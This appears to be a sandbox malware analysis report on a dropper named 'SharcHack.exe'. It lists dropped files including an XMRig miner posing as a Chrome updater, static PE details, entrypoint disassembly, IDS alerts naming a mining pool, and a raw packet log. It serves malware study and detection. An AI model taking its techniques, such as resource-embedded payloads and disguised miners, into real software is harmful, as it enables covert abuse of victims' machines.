Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_yudmgqx3.sek.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_zl01crjh.cim.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\cfoutowi.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1993216
Entropy (8bit):	7.937291620882887
Encrypted:	false
SSDEEP:	49152:a0345NXqa1p8X7stbjkI8skQ0beZ5kxdxhngmN5lp32qIH+Du+9nL:a0o5NTrttEIj0aZ2xdxxgmzX3eUu+9
MD5:	16B93C72B9B6AE18C2A7B1C3330BF8BB
SHA1:	9B8478973757D18B6FC4D2873A82F4F8F7E6FED8
SHA-256:	84C56026C8C3177D0269B52883D4EEA3E6BEE3BDA03479E8FA39C739E6914B7D
SHA-512:	8C1669324D8B70A2911CC1833FCAD31A1394A068A328C0C03864DBF78034BD172E3DAC6685C9F37DA856993847349D6E0C6394C72C666C5ACB3025E254B70FA9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\cfoutowi.tmp, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......HJ...+..+..+..@..+..@..+..@..+..@..+.^^..+.^^..+.^^.n+.jD(..+..^..+..@..+..+....[._)..^....^..+..^..+..+B..+..^..+.Rich.+.........PE..d...`.Vc.........."......`........`. '....`....@.............................@............`..................................................4..H....0........{.,............7..$............................)..(...X..8...........................................UPX0......`.............................UPX1.....`....`..\..................@....rsrc........0.......`..............@......................................................................................................................................................................................................................................................................................................................4.00.UPX!.$..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9907570228332245
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SharcHack.exe
File size:	41'879'040 bytes
MD5:	796310542e9fb2886de3f8cbdf88c9fa
SHA1:	01dc8e64ff23db2f177e3d999c12329bfcd206d3
SHA256:	9f3b062a0f8caf16be80ac44ade55a8b8e8928ef87ae909f5d6d52aa44208193
SHA512:	73295b9cfa07432b21d1f0d0bad360460f32d7e0170dc84406a35f4dfe2b1519fdc4028299f1075385ae4ab738be1e5bfffd7335c1038e2126669834e9a50966
SSDEEP:	786432:Y31/CaCJz7+GWl3LNCxuEnwFho+zM77UDZiZCd08jFZJAI5E70TZFHng:URCR6GWl3LMEXFhV0KAcNjxAItjg
TLSH:	7397332BE26C516ECC995B3D5A7293208D776A716F0A8D1903FC36CCCF62E700E6A517
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	696ce8f0d2d44c6d

Static PE Info

General

Entrypoint:	0x4020cc
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d59a4a699610169663a929d37c90be43

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov ecx, 0000000Ch
push 00000000h
push 00000000h
dec ecx
jne 00007EFFE11B965Bh
push ecx
push ebx
push esi
push edi
mov eax, 0040209Ch
call 00007EFFE11B90D0h
xor eax, eax
push ebp
push 00402361h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
lea edx, dword ptr [ebp-14h]
mov eax, 00402378h
call 00007EFFE11B94A9h
mov eax, dword ptr [ebp-14h]
call 00007EFFE11B9579h
mov edi, eax
test edi, edi
jng 00007EFFE11B9896h
mov ebx, 00000001h
lea edx, dword ptr [ebp-20h]
mov eax, ebx
call 00007EFFE11B9538h
mov ecx, dword ptr [ebp-20h]
lea eax, dword ptr [ebp-1Ch]
mov edx, 00402384h
call 00007EFFE11B8CC8h
mov eax, dword ptr [ebp-1Ch]
lea edx, dword ptr [ebp-18h]
call 00007EFFE11B946Dh
mov edx, dword ptr [ebp-18h]
mov eax, 00404680h
call 00007EFFE11B8BA0h
lea edx, dword ptr [ebp-2Ch]
mov eax, ebx
call 00007EFFE11B9506h
mov ecx, dword ptr [ebp-2Ch]
lea eax, dword ptr [ebp-28h]
mov edx, 00402390h
call 00007EFFE11B8C96h
mov eax, dword ptr [ebp-28h]
lea edx, dword ptr [ebp-24h]
call 00007EFFE11B943Bh
mov edx, dword ptr [ebp-24h]
mov eax, 00404684h
call 00007EFFE11B8B6Eh
lea edx, dword ptr [ebp-38h]
mov eax, ebx
call 00007EFFE11B94D4h
mov ecx, dword ptr [ebp-38h]
lea eax, dword ptr [ebp-34h]
mov edx, 0040239Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5000	0x302	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9000	0x27ee2b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8000	0x1c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x7000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x13b8	0x1400	e5913936857bed3b3b2fbac53e973471	False	0.6318359375	data	6.340990548290613	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x3000	0x7c	0x200	cef89de607e490725490a3cd679af6bb	False	0.162109375	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4230400	1.1176271682252383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x4000	0x695	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x5000	0x302	0x400	3d2f2fc4e279cba623217ec9de264c4f	False	0.3876953125	data	3.47731642923935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x6000	0x4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x7000	0x18	0x200	467f29e48f3451df774e13adae5aafc2	False	0.05078125	data	0.1991075177871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x8000	0x1c8	0x200	9859d413c7408cb699cca05d648c2502	False	0.876953125	data	5.7832974211095225	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x9000	0x27ee2b0	0x27ee400	b70e04cb4b09237c962a9bb891c9b65a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x93c0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.07745770732284396
RT_RCDATA	0x19be8	0x38b200	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows	0.9559793472290039
RT_RCDATA	0x3a4de8	0x7b1c00	PE32 executable (GUI) Intel 80386, for MS Windows	0.9835062026977539
RT_RCDATA	0xb569e8	0x1ca05a0	PE32 executable (GUI) Intel 80386, for MS Windows	0.47138500213623047
RT_RCDATA	0x27f6f88	0x5	ASCII text, with no line terminators	2.6
RT_RCDATA	0x27f6f90	0x12	ASCII text, with no line terminators	1.4444444444444444
RT_RCDATA	0x27f6fa4	0x11	ASCII text, with no line terminators	1.4705882352941178
RT_RCDATA	0x27f6fb8	0x1	very short file (no magic)	9.0
RT_RCDATA	0x27f6fbc	0x1	very short file (no magic)	9.0
RT_RCDATA	0x27f6fc0	0x1	very short file (no magic)	9.0
RT_RCDATA	0x27f6fc4	0x1	very short file (no magic)	9.0
RT_RCDATA	0x27f6fc8	0x1	very short file (no magic)	9.0
RT_RCDATA	0x27f6fcc	0x1	very short file (no magic)	9.0
RT_RCDATA	0x27f6fd0	0x1	very short file (no magic)	9.0
RT_GROUP_ICON	0x27f6fd4	0x14	data	1.15
RT_VERSION	0x27f6fe8	0x2c8	data	0.46769662921348315

Imports

DLL	Import
kernel32.dll	GetCurrentThreadId, SetCurrentDirectoryA, GetCurrentDirectoryA, ExitProcess, RtlUnwind, RaiseException, TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA, FreeLibrary, HeapFree, HeapReAlloc, HeapAlloc, GetProcessHeap
kernel32.dll	WriteFile, SizeofResource, SetFilePointer, LockResource, LoadResource, GetWindowsDirectoryA, GetTempPathA, GetSystemDirectoryA, FreeResource, FindResourceA, CreateFileA, CloseHandle
shfolder.dll	SHGetFolderPathA
shell32.dll	ShellExecuteA

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T22:20:09.749368+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	65.9.108.148	443	TCP
2024-12-28T22:20:11.410883+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	65.9.108.148	443	TCP
2024-12-28T22:20:13.426126+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	13.226.4.166	443	TCP
2024-12-28T22:20:16.405067+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49712	65.9.108.148	443	TCP
2024-12-28T22:20:19.772976+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	65.9.108.148	443	TCP
2024-12-28T22:20:22.562655+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49720	13.226.4.166	443	TCP
2024-12-28T22:20:26.326871+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49726	65.9.108.148	443	TCP
2024-12-28T22:20:28.816418+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49737	13.226.4.166	443	TCP
2024-12-28T22:20:32.211814+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49743	65.9.108.148	443	TCP
2024-12-28T22:20:34.892716+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49749	13.226.4.166	443	TCP
2024-12-28T22:20:38.184365+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49759	65.9.108.148	443	TCP
2024-12-28T22:20:40.986490+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49766	13.226.4.166	443	TCP
2024-12-28T22:20:44.041813+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49772	65.9.108.148	443	TCP
2024-12-28T22:20:46.781988+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49778	13.226.4.166	443	TCP
2024-12-28T22:20:49.809690+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49784	65.9.108.148	443	TCP
2024-12-28T22:20:52.463831+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49793	65.9.108.148	443	TCP
2024-12-28T22:21:00.024648+0100	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.5	58867	1.1.1.1	53	UDP
2024-12-28T22:21:14.267209+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49838	65.9.108.93	443	TCP
2024-12-28T22:21:18.184701+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49849	65.9.108.93	443	TCP
2024-12-28T22:21:31.158290+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49873	18.66.161.123	443	TCP
2024-12-28T22:21:36.603537+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49887	65.9.108.93	443	TCP
2024-12-28T22:21:38.521343+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49891	54.186.212.229	443	TCP
2024-12-28T22:21:39.438945+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49896	3.165.135.3	443	TCP
2024-12-28T22:21:41.545301+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49900	54.186.212.229	443	TCP
2024-12-28T22:21:42.672007+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49903	65.9.108.93	443	TCP
2024-12-28T22:21:44.379806+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49910	2.16.168.105	443	TCP
2024-12-28T22:21:45.353520+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49911	3.165.135.3	443	TCP
2024-12-28T22:21:46.849187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49913	2.16.168.105	443	TCP
2024-12-28T22:21:47.479091+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49919	65.9.108.93	443	TCP
2024-12-28T22:21:49.461500+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49921	3.165.135.3	443	TCP
2024-12-28T22:21:50.311731+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49922	54.186.212.229	443	TCP
2024-12-28T22:21:52.482130+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49929	2.16.168.105	443	TCP
2024-12-28T22:21:54.648806+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49936	2.16.168.105	443	TCP
2024-12-28T22:21:57.367844+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49942	2.16.168.105	443	TCP
2024-12-28T22:21:58.545128+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49943	65.9.108.93	443	TCP
2024-12-28T22:22:00.529844+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49949	2.16.168.115	443	TCP
2024-12-28T22:22:01.134398+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49951	3.165.135.3	443	TCP
2024-12-28T22:22:03.811939+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49957	2.16.168.115	443	TCP
2024-12-28T22:22:05.973078+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49964	2.16.168.115	443	TCP
2024-12-28T22:22:08.446424+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49971	54.186.212.229	443	TCP
2024-12-28T22:22:10.667366+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49981	2.16.168.115	443	TCP
2024-12-28T22:22:25.620185+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	50016	104.20.94.94	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 22:20:03.332597971 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:03.332626104 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:03.332700968 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:03.408540964 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:03.408556938 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:04.681807995 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:04.681895018 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:04.685838938 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:04.685849905 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:04.686177015 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:04.753932953 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:04.795344114 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:05.123899937 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:05.123965979 CET	443	49704	172.67.160.84	192.168.2.5
Dec 28, 2024 22:20:05.124188900 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:05.144629955 CET	49704	443	192.168.2.5	172.67.160.84
Dec 28, 2024 22:20:05.303652048 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:05.303693056 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:05.304044962 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:05.304558992 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:05.304574013 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.522849083 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.522936106 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:06.528413057 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:06.528434992 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.528816938 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.530735970 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:06.575336933 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988471031 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988540888 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988579035 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988596916 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:06.988632917 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988672972 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:06.988681078 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988742113 CET	443	49705	104.21.85.189	192.168.2.5
Dec 28, 2024 22:20:06.988799095 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:06.995058060 CET	49705	443	192.168.2.5	104.21.85.189
Dec 28, 2024 22:20:08.084372997 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:08.084412098 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:08.084515095 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:08.085717916 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:08.085732937 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:09.322633982 CET	49707	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:09.442213058 CET	80	49707	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:09.442292929 CET	49707	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:09.442434072 CET	49707	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:09.561928988 CET	80	49707	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:09.749277115 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:09.749367952 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:09.751604080 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:09.751617908 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:09.751868010 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:09.803600073 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:09.839515924 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:09.839589119 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:09.839632988 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.648534060 CET	80	49707	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:10.795880079 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.795902967 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.795909882 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.795943022 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.795991898 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:10.795999050 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.796039104 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:10.820899010 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.820934057 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.821005106 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.821038008 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:10.821078062 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:10.821902990 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:10.821916103 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.821928024 CET	49706	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:10.821932077 CET	443	49706	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:10.857687950 CET	49707	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:11.049164057 CET	49708	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:11.049215078 CET	443	49708	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:11.049426079 CET	49708	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:11.049887896 CET	49708	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:11.049897909 CET	443	49708	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:11.223251104 CET	49707	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:11.267491102 CET	49709	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:11.410882950 CET	49708	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:11.506608963 CET	80	49709	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:11.506695032 CET	49709	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:11.507074118 CET	49709	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:11.507370949 CET	80	49707	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:11.507428885 CET	49707	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:11.626511097 CET	80	49709	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:11.762845993 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:11.762904882 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:11.762989044 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:11.763598919 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:11.763617039 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:12.742219925 CET	80	49709	208.95.112.1	192.168.2.5
Dec 28, 2024 22:20:12.882932901 CET	49709	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:12.921799898 CET	49709	80	192.168.2.5	208.95.112.1
Dec 28, 2024 22:20:13.426026106 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:13.426126003 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:13.432904959 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:13.432955027 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:13.433332920 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:13.434695959 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:13.434696913 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:13.434740067 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:14.457029104 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:14.457237005 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:14.457343102 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:14.463385105 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:14.463408947 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:14.463421106 CET	49710	443	192.168.2.5	13.226.4.166
Dec 28, 2024 22:20:14.463428020 CET	443	49710	13.226.4.166	192.168.2.5
Dec 28, 2024 22:20:14.696188927 CET	49712	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:14.696225882 CET	443	49712	65.9.108.148	192.168.2.5
Dec 28, 2024 22:20:14.696449041 CET	49712	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:14.696774960 CET	49712	443	192.168.2.5	65.9.108.148
Dec 28, 2024 22:20:14.696793079 CET	443	49712	65.9.108.148	192.168.2.5
